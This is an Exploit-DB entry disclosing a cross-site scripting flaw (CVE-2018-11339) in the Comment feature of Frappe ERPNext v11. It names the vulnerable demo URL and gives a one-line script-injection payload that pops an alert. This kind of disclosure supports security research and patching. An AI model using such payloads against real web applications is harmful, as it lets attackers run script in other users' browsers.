ERPnext 11 - Cross-Site Scripting

EDB-ID: 44691
Author: Veerababu Penugonda
Published: 2018-05-22
CVE: CVE-2018-11339
Type: Webapps
Platform: Linux
Vulnerable App: N/A

 # Date: 2018-05-10 
# Exploit Author: Veerababu Penugonda
# Vendor Homepage: https://erpnext.com/
# Software Link: https://demo.erpnext.com/
# Version: Frappe ERPNext v11.x.x-develop
# Tested on: Mozilla Firefox quantum 60.1 , Ubuntu OS
# CVE : CVE-2018-11339

# 1. Description:
# https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015
# and functionality “Comment” is vulnerable to XSS like Stored ,
# Reflected , Cookie , possible for more

# 2. Payload :

"><script>alert(1)</script>

Related Posts